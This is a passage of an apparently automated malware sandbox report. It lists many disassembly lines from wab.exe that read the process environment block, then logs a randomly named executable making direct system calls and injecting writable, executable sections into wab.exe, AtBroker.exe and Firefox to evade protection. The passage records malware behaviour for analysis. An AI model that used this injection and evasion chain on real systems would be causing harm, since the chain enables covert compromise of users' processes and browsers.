        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C866E mov eax, dword ptr fs:[00000030h]8_2_227C866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A660 mov eax, dword ptr fs:[00000030h]8_2_2273A660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A660 mov eax, dword ptr fs:[00000030h]8_2_2273A660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22739660 mov eax, dword ptr fs:[00000030h]8_2_22739660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22739660 mov eax, dword ptr fs:[00000030h]8_2_22739660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271C640 mov eax, dword ptr fs:[00000030h]8_2_2271C640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF626 mov eax, dword ptr fs:[00000030h]8_2_226FF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5636 mov eax, dword ptr fs:[00000030h]8_2_227D5636
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22736620 mov eax, dword ptr fs:[00000030h]8_2_22736620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22738620 mov eax, dword ptr fs:[00000030h]8_2_22738620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E627 mov eax, dword ptr fs:[00000030h]8_2_2271E627
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270262C mov eax, dword ptr fs:[00000030h]8_2_2270262C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22703616 mov eax, dword ptr fs:[00000030h]8_2_22703616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22703616 mov eax, dword ptr fs:[00000030h]8_2_22703616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742619 mov eax, dword ptr fs:[00000030h]8_2_22742619
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273F603 mov eax, dword ptr fs:[00000030h]8_2_2273F603
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22731607 mov eax, dword ptr fs:[00000030h]8_2_22731607
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271260B mov eax, dword ptr fs:[00000030h]8_2_2271260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E609 mov eax, dword ptr fs:[00000030h]8_2_2277E609
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E6F2 mov eax, dword ptr fs:[00000030h]8_2_2277E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E6F2 mov eax, dword ptr fs:[00000030h]8_2_2277E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E6F2 mov eax, dword ptr fs:[00000030h]8_2_2277E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277E6F2 mov eax, dword ptr fs:[00000030h]8_2_2277E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227806F1 mov eax, dword ptr fs:[00000030h]8_2_227806F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227806F1 mov eax, dword ptr fs:[00000030h]8_2_227806F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BD6F0 mov eax, dword ptr fs:[00000030h]8_2_227BD6F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272D6E0 mov eax, dword ptr fs:[00000030h]8_2_2272D6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272D6E0 mov eax, dword ptr fs:[00000030h]8_2_2272D6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227936EE mov eax, dword ptr fs:[00000030h]8_2_227936EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227336EF mov eax, dword ptr fs:[00000030h]8_2_227336EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270B6C0 mov eax, dword ptr fs:[00000030h]8_2_2270B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C16CC mov eax, dword ptr fs:[00000030h]8_2_227C16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C16CC mov eax, dword ptr fs:[00000030h]8_2_227C16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C16CC mov eax, dword ptr fs:[00000030h]8_2_227C16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C16CC mov eax, dword ptr fs:[00000030h]8_2_227C16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A6C7 mov ebx, dword ptr fs:[00000030h]8_2_2273A6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A6C7 mov eax, dword ptr fs:[00000030h]8_2_2273A6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF6C7 mov eax, dword ptr fs:[00000030h]8_2_227BF6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227316CF mov eax, dword ptr fs:[00000030h]8_2_227316CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227366B0 mov eax, dword ptr fs:[00000030h]8_2_227366B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD6AA mov eax, dword ptr fs:[00000030h]8_2_226FD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD6AA mov eax, dword ptr fs:[00000030h]8_2_226FD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273C6A6 mov eax, dword ptr fs:[00000030h]8_2_2273C6A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F76B2 mov eax, dword ptr fs:[00000030h]8_2_226F76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F76B2 mov eax, dword ptr fs:[00000030h]8_2_226F76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F76B2 mov eax, dword ptr fs:[00000030h]8_2_226F76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22704690 mov eax, dword ptr fs:[00000030h]8_2_22704690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22704690 mov eax, dword ptr fs:[00000030h]8_2_22704690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278368C mov eax, dword ptr fs:[00000030h]8_2_2278368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278368C mov eax, dword ptr fs:[00000030h]8_2_2278368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278368C mov eax, dword ptr fs:[00000030h]8_2_2278368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278368C mov eax, dword ptr fs:[00000030h]8_2_2278368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22708770 mov eax, dword ptr fs:[00000030h]8_2_22708770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710770 mov eax, dword ptr fs:[00000030h]8_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB765 mov eax, dword ptr fs:[00000030h]8_2_226FB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB765 mov eax, dword ptr fs:[00000030h]8_2_226FB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB765 mov eax, dword ptr fs:[00000030h]8_2_226FB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB765 mov eax, dword ptr fs:[00000030h]8_2_226FB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22700750 mov eax, dword ptr fs:[00000030h]8_2_22700750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742750 mov eax, dword ptr fs:[00000030h]8_2_22742750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742750 mov eax, dword ptr fs:[00000030h]8_2_22742750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278E75D mov eax, dword ptr fs:[00000030h]8_2_2278E75D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22784755 mov eax, dword ptr fs:[00000030h]8_2_22784755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22713740 mov eax, dword ptr fs:[00000030h]8_2_22713740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22713740 mov eax, dword ptr fs:[00000030h]8_2_22713740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22713740 mov eax, dword ptr fs:[00000030h]8_2_22713740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D3749 mov eax, dword ptr fs:[00000030h]8_2_227D3749
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273674D mov esi, dword ptr fs:[00000030h]8_2_2273674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273674D mov eax, dword ptr fs:[00000030h]8_2_2273674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273674D mov eax, dword ptr fs:[00000030h]8_2_2273674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DB73C mov eax, dword ptr fs:[00000030h]8_2_227DB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DB73C mov eax, dword ptr fs:[00000030h]8_2_227DB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DB73C mov eax, dword ptr fs:[00000030h]8_2_227DB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DB73C mov eax, dword ptr fs:[00000030h]8_2_227DB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277C730 mov eax, dword ptr fs:[00000030h]8_2_2277C730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22735734 mov eax, dword ptr fs:[00000030h]8_2_22735734
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270973A mov eax, dword ptr fs:[00000030h]8_2_2270973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270973A mov eax, dword ptr fs:[00000030h]8_2_2270973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273273C mov eax, dword ptr fs:[00000030h]8_2_2273273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273273C mov ecx, dword ptr fs:[00000030h]8_2_2273273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273273C mov eax, dword ptr fs:[00000030h]8_2_2273273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22703720 mov eax, dword ptr fs:[00000030h]8_2_22703720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271F720 mov eax, dword ptr fs:[00000030h]8_2_2271F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271F720 mov eax, dword ptr fs:[00000030h]8_2_2271F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271F720 mov eax, dword ptr fs:[00000030h]8_2_2271F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273C720 mov eax, dword ptr fs:[00000030h]8_2_2273C720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273C720 mov eax, dword ptr fs:[00000030h]8_2_2273C720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF72E mov eax, dword ptr fs:[00000030h]8_2_227BF72E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C972B mov eax, dword ptr fs:[00000030h]8_2_227C972B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9730 mov eax, dword ptr fs:[00000030h]8_2_226F9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9730 mov eax, dword ptr fs:[00000030h]8_2_226F9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22700710 mov eax, dword ptr fs:[00000030h]8_2_22700710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22730710 mov eax, dword ptr fs:[00000030h]8_2_22730710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273F71F mov eax, dword ptr fs:[00000030h]8_2_2273F71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273F71F mov eax, dword ptr fs:[00000030h]8_2_2273F71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22705702 mov eax, dword ptr fs:[00000030h]8_2_22705702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22705702 mov eax, dword ptr fs:[00000030h]8_2_22705702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22707703 mov eax, dword ptr fs:[00000030h]8_2_22707703
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273C700 mov eax, dword ptr fs:[00000030h]8_2_2273C700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227047FB mov eax, dword ptr fs:[00000030h]8_2_227047FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227047FB mov eax, dword ptr fs:[00000030h]8_2_227047FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270D7E0 mov ecx, dword ptr fs:[00000030h]8_2_2270D7E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278E7E1 mov eax, dword ptr fs:[00000030h]8_2_2278E7E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227227ED mov eax, dword ptr fs:[00000030h]8_2_227227ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227227ED mov eax, dword ptr fs:[00000030h]8_2_227227ED

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtSetInformationThread: Direct from: 0x76EF2ECCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtClose: Direct from: 0x76EF2B6C
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 1712Jump to behavior
